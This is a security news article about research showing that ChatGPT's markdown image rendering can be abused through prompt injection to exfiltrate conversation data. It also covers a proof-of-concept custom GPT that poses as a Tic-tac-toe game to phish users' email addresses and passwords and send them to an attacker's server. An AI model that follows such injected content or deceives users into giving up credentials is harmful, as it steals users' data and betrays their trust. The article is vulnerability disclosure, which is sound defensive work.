Connect with us

Hi, what are you looking for?


Artificial Intelligence

Malicious GPT Can Phish Credentials, Exfiltrate Them to External Server: Researcher

A researcher has shown how malicious actors can create custom GPTs that can phish for credentials and exfiltrate them to external servers. 

ChatGPT attack

A researcher has shown how malicious actors could create custom GPTs that can phish for user credentials and exfiltrate the stolen data to an external server. 

Researchers Johann Rehberger and Roman Samoilenko independently discovered in the spring of 2023 that ChatGPT was vulnerable to a prompt injection attack that involved the chatbot rendering markdown images. 

They demonstrated how an attacker could leverage image markdown rendering to steal potentially sensitive information from a user’s conversation with ChatGPT by getting the victim to paste apparently harmless but malicious content from the attacker’s website. The attack also works by asking ChatGPT to summarize the content from a website hosting specially crafted code. In both cases, the markdown image processed by the chatbot — which can be an invisible single-pixel image — is hosted on the attacker’s site.

ChatGPT creator OpenAI was informed about the attack method at the time, but said it was a feature that it did not plan on addressing. 

Rehberger said similar issues were found in chatbots such as Bing Chat, Google’s Bard and Anthropic Claud, whose developers released fixes. 

The researcher noticed this week that OpenAI has also started taking action to tackle the attack method. The mitigations have apparently only been applied to the web application — the attack still works on mobile apps — and they don’t completely prevent attacks. However, the researcher described it as a “step in the right direction”.

[ Watch Sessions From SecurityWeek’s 2023 Cyber AI & Automation Summit ]

On December 12, before OpenAI started rolling out mitigations, Rehberger published a blog post describing how the image markdown injection issue can be exploited in combination with custom versions of ChatGPT. 

Advertisement. Scroll to continue reading.

OpenAI announced in November that Plus and Enterprise users of ChatGPT would be allowed to create their own GPT, which they can customize for specific tasks or topics. 

Rehberger created a GPT named ‘The Thief’ that attempts to trick users into handing over their email address and password and then exfiltrates the data to an external server controlled by the attacker without the victim’s knowledge. 

This GPT claims to play a game of Tic-tac-toe against the user and requires an email address for a ‘personalized experience’ and the user’s password as part of a ‘security process’. The provided information is then sent to the attacker’s server. 

The researcher also showed how an attacker may be able to publish such a malicious GPT on the official GPTStore. OpenAI has implemented a system that prevents the publishing of GPTs that are obviously malicious. 

SecurityWeek has reached out to OpenAI for comment on the security research and will update this article if the company responds. 

Related: Major Organizations Using ‘Hugging Face’ AI Tools Put at Risk by Leaked API Tokens

Related: Simple Attack Allowed Extraction of ChatGPT Training Data

Related: Over a Dozen Exploitable Vulnerabilities Found in AI/ML Tools

Written By

Eduard Kovacs (@EduardKovacs) is a managing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.


Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Gain valuable insights from industry professionals who will help guide you through the intricacies of industrial cybersecurity.


Join us for an in depth exploration of the critical nature of software and vendor supply chain security issues with a focus on understanding how attacks against identity infrastructure come with major cascading effects.


Expert Insights

Related Content

Artificial Intelligence

The CRYSTALS-Kyber public-key encryption and key encapsulation mechanism recommended by NIST for post-quantum cryptography has been broken using AI combined with side channel attacks.

Artificial Intelligence

The release of OpenAI’s ChatGPT in late 2022 has demonstrated the potential of AI for both good and bad.

Artificial Intelligence

ChatGPT is increasingly integrated into cybersecurity products and services as the industry is testing its capabilities and limitations.

Artificial Intelligence

The degree of danger that may be introduced when adversaries start to use AI as an effective weapon of attack rather than a tool...

Artificial Intelligence

Two of humanity’s greatest drivers, greed and curiosity, will push AI development forward. Our only hope is that we can control it.

Artificial Intelligence

Microsoft and Mitre release Arsenal plugin to help cybersecurity professionals emulate attacks on machine learning (ML) systems.

Application Security

Thinking through the good, the bad, and the ugly now is a process that affords us “the negative focus to survive, but a positive...

Artificial Intelligence

Two new surveys stress the need for automation and AI – but one survey raises the additional specter of the growing use of bring...